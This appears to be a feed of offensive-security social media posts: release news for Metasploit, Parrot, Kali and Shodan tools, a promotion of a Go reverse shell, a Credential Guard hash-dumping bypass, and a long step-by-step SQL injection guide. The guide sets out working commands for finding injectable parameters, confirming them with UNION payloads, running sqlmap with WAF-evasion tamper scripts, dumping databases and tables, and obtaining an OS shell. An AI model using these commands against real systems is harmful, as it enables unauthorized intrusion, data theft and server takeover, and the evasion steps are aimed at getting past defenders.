Metasploit 6.5 is out just in time for Hack Summer Camp. This release comes with Malleable C2 support for Meterpreter, more relaying improvements and an integrated MCP server. Check out all the details here: https://t.co/GcjZVboiUT
New release of Shodan Terminal (0.13.1) that includes various quality of life improvements and shows account status information if you're getting close to the usage limit. Now also available as an .msi package: https://t.co/IuqO5QdjQG
Parrot 7.2 is now available 🦜
This release focuses heavily on technical improvements across the entire ecosystem, from infrastructure and Docker containers to VM builds, core components and security tooling.
Included in this update:
• Linux Kernel 6.19.13 with patch for CVE-2026-31431 “Copy Fail”
• Updated offensive security tools
• ARM & Hack The Box image support
Available now on the download page 🔎
Click the link and read more on our latest article ⤵️
https://t.co/fi7w0tSgZJ
#ParrotSec #ParrotOS #linux #linuxdistro #pentest #pentesting #hacker #hackers #cybersec #cybersecurity #cybersecuritynews #debian
xc - a lightweight reverse shell.
Written in golang, works on both Linux and Windows. It is designed for simplicity and provides a basic mechanism for remote command execution.
A tool by Martin Mielke (@xct_de)
Source: https://t.co/7GkkYyFpEN
#redteam#blueteam#maldev #malwaredevelopment
Kali Linux 2026.1 Release (2026 Theme & BackTrack Mode): New year, new release - Kali 2026.1 is here! There is everything from a fresh coat of paint to a nod to our roots, with normal ongoing improvements. Building on from December’s 2025.4, the summary… https://t.co/Xz0mWSTqCD
I've been packaging multiple new tools for Kali Linux
💠 adaptixc2: post-exploitation framework
💠 wpprobe: wordPress enumeration
💠sstimap: ssti detection
💠xsstrike: XSS scanner
💠gef: modern experience for GDB
💠fluxion: security auditing and social-engineering
This week's release packs a punch with 5 new modules, including unauthenticated RCEs targeting ChurchCRM and the WordPress StoryChief plugin, plus creative persistence methods for Emacs and Windows. Check it out in the weekly wrap up: https://t.co/YTtwjsm5mw
DumpGuard
On the latest versions of Windows, mimikatz becomes useless when you try to dump LSASS. This happens because there is no longer anything valuable left in LSASS. All secrets are stored in a separate protected process, lsaiso.exe. This protection mechanism is called Credential Guard, and it is enabled by default starting with Windows 22H2 / Windows Server 2025.
But there is a “bypass” that abuses Remote Credential Guard, which is normally used during RDP sessions to avoid sending credentials to a remote server, and retrieve all NTLMv1 hashes despite the protection being enabled
https://t.co/KLBc4Ej8ZE
#dfir #blueteam #redteam #Pentesting #ThreatHunting
Advanced Guide to Detecting and Exploiting SQL Injection
Introduction:
In this guide, we’ll delve into a more advanced method for detecting SQL Injection vulnerabilities and efficiently exploiting them using SQLMap. This approach will help identify vulnerable endpoints more accurately and allow for precise exploitation, targeting various databases.
⸻
Step 1: Automating SQL Injection Discovery
To streamline the process of identifying SQL Injection points, we’ll use a powerful combination of tools and commands:
Command:
echo "http://<target>/" | gau | uro | grep "\?" | sed "s/=.*/=A'/" | uniq > params.txt;
cat params.txt | httpx -mc 200 -mr ".*SQL.*|.*syntax.*|.*error.*" -silent
Explanation:
1.gau (Get All URLs): Retrieves a comprehensive list of endpoints for the target.
2.uro: Removes duplicate URLs to reduce redundancy.
3.grep “?”: Filters only endpoints with parameters.
4.sed: Replaces parameter values with a typical SQL Injection payload (=A').
5.uniq: Ensures unique endpoints are recorded.
6.httpx: Probes each endpoint for SQL error messages, displaying only successful hits (-mc 200).
7.-mr: Matches responses containing SQL error patterns.
8.-silent: Reduces clutter for a cleaner output.
Pro Tip:
Add more patterns to the regex search for better detection:
-mr ".*SQL.*|.*syntax.*|.*error.*|.*database.*|.*ODBC.*|.*mysqli.*|.*MySQL.*|.*pgSQL.*"
⸻
Step 2: Analyzing the Results
Upon executing the command, you’ll obtain a list of potential vulnerable endpoints. To further verify these, perform a manual inspection using simple payloads:
Manual Payloads:
curl -s "http://<target>/vuln?param=1'" | grep -i "SQL syntax"
curl -s "http://<target>/vuln?param=-1 UNION SELECT 1,2,3" | grep -i "SQL syntax"
If the response contains SQL syntax errors or related messages, proceed to exploitation.
⸻
Step 3: Advanced Exploitation with SQLMap
Once a potential vulnerability is identified, leverage SQLMap for exploitation. Fine-tune your attack by specifying the database type and increasing risk and level for deeper analysis.
Command:
sqlmap -u "http://<target>/vuln?param=A" -p param --dbms=MSSQL --level 5 --risk 3 --banner --batch --random-agent --tamper=space2comment
Explanation:
•-p param: Specifies the vulnerable parameter.
•–dbms: Indicates the database management system (e.g., MSSQL, MySQL, PostgreSQL).
•–level 5 –risk 3: Sets the level and risk to the highest for more comprehensive testing.
•–banner: Retrieves the database banner for identification.
•–batch: Automates the process by skipping interactive prompts.
•–random-agent: Uses a random user agent to evade detection.
•–tamper=space2comment: Obfuscates payloads to bypass WAF or filters.
⸻
Step 4: Extracting Data from the Database
After confirming the vulnerability, proceed with data extraction. To enumerate databases and dump tables, use the following commands:
Enumerate Databases:
sqlmap -u "http://<target>/vuln?param=A" -p param --dbs
Dump Tables from a Specific Database:
sqlmap -u "http://<target>/vuln?param=A" -p param -D database_name --tables
Dump Data from a Table:
sqlmap -u "http://<target>/vuln?param=A" -p param -D database_name -T table_name --dump
⸻
Advanced Techniques:
1.WAF Bypass:
Utilize multiple tamper scripts to obfuscate your payload:
--tamper=space2comment,between,percentage
2.Proxy for Monitoring:
Integrate Burp Suite for traffic inspection:
--proxy=http://127.0.0.1:8080
3.OS Shell Access:
In case of command execution capabilities:
sqlmap -u "http://<target>/vuln?param=A" -p param --os-shell